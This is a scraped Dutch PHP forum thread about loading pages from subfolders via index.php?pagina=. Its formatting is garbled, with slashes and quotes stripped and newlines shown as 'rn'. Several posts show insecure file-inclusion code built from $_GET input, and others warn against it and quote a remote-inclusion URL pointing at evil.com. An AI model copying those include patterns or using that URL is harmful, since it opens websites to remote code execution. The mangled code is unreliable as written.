login  Naam:   Wachtwoord: 
Registreer je!
 Forum

pagina-

Offline thajunk - 04/03/2005 11:51
Avatar van thajunkOnbekend ik werk nu voor het eerst met:
index.php?pagina=
maar nu wil bestanden uit een andere map opvragen bv.: leden
Hoe doe ik het dan?

18 antwoorden

Gesponsorde links
Offline BigBug - 30/11/1999 00:00
Avatar van BigBug PHP expert index.phppagina=MAPNAAMpagina-naam
Offline Wijnand - 30/11/1999 00:00
Avatar van Wijnand Moderator er rekening mee houden in de core Prnrnen misschien dat index.phpp=MAPpagina oid werkt.
Offline thajunk - 30/11/1999 00:00
Avatar van thajunk Onbekend en als ik het uit een vorige map haal
Offline twopeak - 30/11/1999 00:00
Avatar van twopeak Gouden medaille

PHP ver gevorderde
thajunk;rnrnwerk liever zornpagina.phppagina=informatiernrn[code]rnif ($_GET['pagina'] == informatie) {rn $in_te_laden = $_SERVER['document_root'] . paginasinfo.php;rn}rn[code]rndit zorgt ervoor dat je altijd vrij bent om paginas te nemen uit eenderwelke directory.rnrnJe werkt natuurlijk best met een switch enzo, dit is een voorbeeldje...
Offline Thomas - 30/11/1999 00:00
Avatar van Thomas Moderator Een wat rnrnIk zou met 2 dingen rekening houdenrn- veiligheidrnZorg dat je een switch-statement maakt waarin JIJ definieert welke namen bij welke bestanden horen, anders kan iemand zo informatie bij jou stelen...rnrnhttpwww.dumbass.compage=httpwww.evil.comhackme.txtrnHoi ornrn- werken vanuit de rootrndefinieer gewoon alle pagina's in dat switch-bestand vanuit je www-root, dan heb je geen problemen als je op een pagina in een submap zit.
Offline cracker - 30/11/1999 00:00
Avatar van cracker Onbekend [code]rnphprnif(file_exists($page.php)){rninclude($page.php);rn} else {rninclude(errorpagina.php);rn}rnrn[code]rnZo doe ik het toch cool
Offline Fenrir - 30/11/1999 00:00 (laatste wijziging 30/11/1999 00:00)
Avatar van Fenrir PHP expert dat is niet zo slim Iedereen kan zo remote php uitvoeren. rn[quote] httpwww.dumbass.compage=httpwww.evil.comhackme.txt [quote]
Offline Bart - 30/11/1999 00:00
Avatar van Bart PHP expert Daar zou ik maar niet trots op wezen rn[code]phprninclude($page.php);rn[code]rnIs foutrnHet moet nog altijd zorn[code]phprninclude($page.php);rn[code]
Offline Tuinstoel - 30/11/1999 00:00
Avatar van Tuinstoel PHP expert Yeah sure, dat van jou is ook niet correct Quicky, want .php moet wil tussen quotes in dat geval .rnrnDeze heb ik al vaker gepostrn[code] rn$pArray = array('home','links','contact','informatie','dieren');rn Een array met daarin de toegestane pagina's.rn$pExtensies = array('html','php','htm');rn Een array met de mogelijke extensies die de pagina kan bevatten.rn Let wel op dat hij van links naar rechts leest, dus als jern pagina.html hebt en pagina.php hebt wordt pagina.html gekozen.rn rnif(isset($_GET['pagina']))rn {rn Kijken of de pagina uberhaupt wel wordt aangevraagd.rn Dit wordt doormiddel van superglobals gedaan, dit isrn wel net zo veilig.rn rn if(in_array(strtolower($_GET['pagina']),$pArray))rn {rn Fijn, de pagina bevindt zich in de array, dus hij mag doorrn foreach($pExtensies as $fKey = $fWaarde)rn {rn Met foreach kun je een array doorlopenrn in dit geval lopen we $pExtensies doorrn om te kijken of de pagina eindigt oprn een van de extensies in de arrayrn rn if(file_exists($_GET['pagina'].'.'.$fWaarde))rn {rn include $_GET['pagina'].'.'.$fWaarde;rn Nou dit is dan het enigste punt waar de pagina wordt geincluded.rn break;rn Met break stop je nadat je de pagina hebt gevonden,rn anders loopt de array gewoon door en worden errn meerdere pagina's geincluded.rn }rn }rn }rn elsern {rn echo 'Deze pagina bestaat niet. ';rn De pagina bevindt zich niet in de array, dus je kunt bijvoorbeeldrn een foutmelding weergeven.rn }rn }rnelsern {rn echo 'De homepagina.';rn pagina= staat niet in de adresbalk,rn dus de standaardpagina wordt weergeven.rn }rn [code]
Offline thajunk - 30/11/1999 00:00 (laatste wijziging 30/11/1999 00:00)
Avatar van thajunk Onbekend Ik hou het simpelrn[code] rn if(!$_GET['pagina']) rn $_GET['pagina'] = nieuws; rn rn if(file_exists($_GET['pagina'].'.php')) rn include($_GET['pagina'].'.php'); rn else rn include(error.php); rn rn [code] rnrnMaar nu heb ik een membersysteempje uit V1 gehaald en die heb ik erin gezet. maar als ik nu wil inloggen met dat rnindex.phppagina=ledenloginrndan kan die geen database vinden. En al doe ik het gewoon zornhttpkris.fambaken.nlledenrndan doet ie het wel.rnIk heb nu de config.php in 2 mappen staan maar dat werkt ook nietrnrnEDIT als je het wilt proberern[code]usertestrnpass test[code]
Offline flyingdragon - 30/11/1999 00:00
Avatar van flyingdragon PHP beginner je moet toch alle verwijzingen in je leden systeem aanpassen aan dat index.phppagina=rnrnik heb al me pagina's aangepast en alle links veranderd, toen deed ie het bij mij.rnrndus als er bij mij stond in me bijv me forum op forum.phprnstond een link categorieen.php dat heb ik toen verandert in rnindex.phppagina=forumcategorieen en dat werktrnzo moet je volgens mij alles aanpassen
Avatar van thajunk Onbekend dus ook me config.php
Offline flyingdragon - 30/11/1999 00:00
Avatar van flyingdragon PHP beginner moet je kijken of daar links in staanrn
Offline nemesiskoen - 30/11/1999 00:00 (laatste wijziging 30/11/1999 00:00)
Avatar van nemesiskoen Gouden medaille

PHP expert
[code]phprn if(!$_GET['pagina']) rn $_GET['pagina'] = nieuws; rn rn if(file_exists($_GET['pagina'].'.php')) rn include($_GET['pagina'].'.php'); rn else rn include(error.php); rn[code] rnrnvoor de duizendste keer Zo onveilig als de pest!!!rnje moet niet in de header de map aangevenrndoe gewoon zo rnrnjouwsite.bepagina=nieuwsrnrnen dan is je script(niet getest)rnrn[code]phprnswitch($_GET['pagina']){rn case nieuws include(nieuwsindex.php); break; dankuwel prosoftrn case forum include(forumindex.php); break;rn}rn[code] rnrnje gaat gewoon na welke pagina er in de $_GET variabele 'pagina' staat, en die laad je dan in, als die in een map staat dan zet je dat in de include en niet in de header
Offline prorsoft - 30/11/1999 00:00
Avatar van prorsoft PHP gevorderde er moet nog [b]break;[b] staan
Avatar van thajunk Onbekend @nemiskoenrnik snap jou manier niet, (ben php noob)rnDus als je iets meer uitleg wil geven dat ik het wel snap zou da makkelijk zijn
Offline prorsoft - 30/11/1999 00:00
Avatar van prorsoft PHP gevorderde d'r is een tutorial overrnhttpwww.sitemasters.bepagina=tutorialstutorials&cat=4&id=46#3
Offline Wim - 30/11/1999 00:00
Avatar van Wim Crew algemeen of pagina=ledenhallo (wordt dan naar ledenhallo.php verwezen)
Gesponsorde links
Dit onderwerp is gesloten.
Actieve forumberichten
© 2002-2024 Sitemasters.be - Regels - Laadtijd: 0.192s